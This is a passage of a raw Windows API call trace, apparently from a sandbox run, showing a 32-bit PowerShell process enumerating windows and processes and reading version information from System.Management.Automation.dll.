GetModuleFileNameExW (in: hProcess=0x304, hModule=0x21d10000, lpFilename=0x3b29f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0050.019] GetLastError () returned 0x0 [0050.020] CloseHandle (hObject=0x304) returned 1 [0050.020] GetLastError () returned 0x0 [0050.022] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa2c) returned 0x304 [0050.023] GetLastError () returned 0x0 [0050.024] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x29a6f40 | out: lpExitCode=0x29a6f40*=0x103) returned 1 [0050.024] GetLastError () returned 0x0 [0050.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39a5278, Length=0x20000, ResultLength=0x2cee4c | out: SystemInformation=0x39a5278, ResultLength=0x2cee4c*=0x9b28) returned 0x0 [0050.050] EnumWindows (lpEnumFunc=0x2963612, lParam=0x0) returned 1 [0050.052] GetWindowThreadProcessId (in: hWnd=0xf011c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xa04 [0050.052] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x558 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x538 [0050.053] GetLastError () returned 0x0 [0050.053] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x778 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x778 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.054] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.054] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.055] GetLastError () returned 0x0 [0050.055] GetWindowThreadProcessId (in: hWnd=0x40124, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xa30 [0050.055] GetLastError () returned 0x0 [0050.057] GetWindow (hWnd=0x40124, uCmd=0x4) returned 0x0 [0050.058] IsWindowVisible (hWnd=0x40124) returned 0 [0050.058] GetWindowThreadProcessId (in: hWnd=0x5011e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x93c [0050.058] GetLastError () returned 0x0 [0050.058] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7a4 [0050.058] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.059] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.059] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x6ac [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x58c [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x688 [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7b0 [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x438 [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x178 [0050.060] GetLastError () returned 0x0 [0050.060] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x204 [0050.060] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x2c8 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x344 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x618 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x184 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7d8 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xc0 [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x78c [0050.061] GetLastError () returned 0x0 [0050.061] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x6fc [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x358 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x3015e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x5e4 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x540 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x538 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x568 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x538 [0050.062] GetLastError () returned 0x0 [0050.062] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x568 [0050.062] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x538 [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x540 [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x540 [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x510 [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x57c [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.063] GetLastError () returned 0x0 [0050.063] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x554 [0050.063] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x528 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x79c [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.064] GetLastError () returned 0x0 [0050.064] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4e0 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x44c [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x778 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.065] GetLastError () returned 0x0 [0050.065] GetWindowThreadProcessId (in: hWnd=0x40122, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xa04 [0050.065] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x301ac, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xa04 [0050.066] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x558 [0050.066] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.066] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4d0 [0050.066] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x40120, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xa40 [0050.066] GetLastError () returned 0x0 [0050.066] GetWindowThreadProcessId (in: hWnd=0x401b8, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x93c [0050.066] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7a4 [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x6ac [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x58c [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x688 [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7b0 [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x438 [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x178 [0050.067] GetLastError () returned 0x0 [0050.067] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x204 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x2c8 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x344 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x618 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x184 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x7d8 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0xc0 [0050.068] GetLastError () returned 0x0 [0050.068] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x78c [0050.068] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x6fc [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x358 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x5e4 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x568 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x538 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x540 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x510 [0050.069] GetLastError () returned 0x0 [0050.069] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.070] GetLastError () returned 0x0 [0050.070] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x79c [0050.070] GetLastError () returned 0x0 [0050.070] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x4e0 [0050.070] GetLastError () returned 0x0 [0050.070] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x460 [0050.070] GetLastError () returned 0x0 [0050.070] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x2ceaa0 | out: lpdwProcessId=0x2ceaa0) returned 0x778 [0050.070] GetLastError () returned 0x0 [0050.070] GetLastError () returned 0x0 [0050.073] WerSetFlags () returned 0x0 [0050.085] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0050.087] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x2cee7c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x2cee78 | out: pulNumLanguages=0x2cee7c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x2cee78) returned 1 [0050.087] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x2cee7c, pwszLanguagesBuffer=0x29bb898, pcchLanguagesBuffer=0x2cee78 | out: pulNumLanguages=0x2cee7c, pwszLanguagesBuffer=0x29bb898, pcchLanguagesBuffer=0x2cee78) returned 1 [0050.094] GetUserDefaultLocaleName (in: lpLocaleName=0x3b8428, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0050.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.133] GetLastError () returned 0xcb [0050.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.137] GetLastError () returned 0xcb [0050.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.139] GetLastError () returned 0xcb [0050.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.149] GetLastError () returned 0xcb [0050.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.149] GetLastError () returned 0xcb [0050.149] SetErrorMode (uMode=0x1) returned 0x1 [0050.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x2ced88 | out: lpFileInformation=0x2ced88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0050.150] GetLastError () returned 0xcb [0050.150] SetErrorMode (uMode=0x1) returned 0x1 [0050.150] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x2cee0c | out: lpdwHandle=0x2cee0c) returned 0x94c [0050.150] GetLastError () returned 0x0 [0050.151] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x29bddc8 | out: lpData=0x29bddc8) returned 1 [0050.151] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2cedd8, puLen=0x2cedd4 | out: lplpBuffer=0x2cedd8*=0x29bde64, puLen=0x2cedd4) returned 1 [0050.151] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29bdf40, puLen=0x2ced50) returned 1 [0050.151] lstrlenW (lpString="Microsoft Corporation") returned 21 [0050.151] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0050.151] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29bdf94, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="System.Management.Automation") returned 28 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29bdff0, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="6.1.7601.17514") returned 14 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29be030, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29be098, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29be134, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x2ced54, 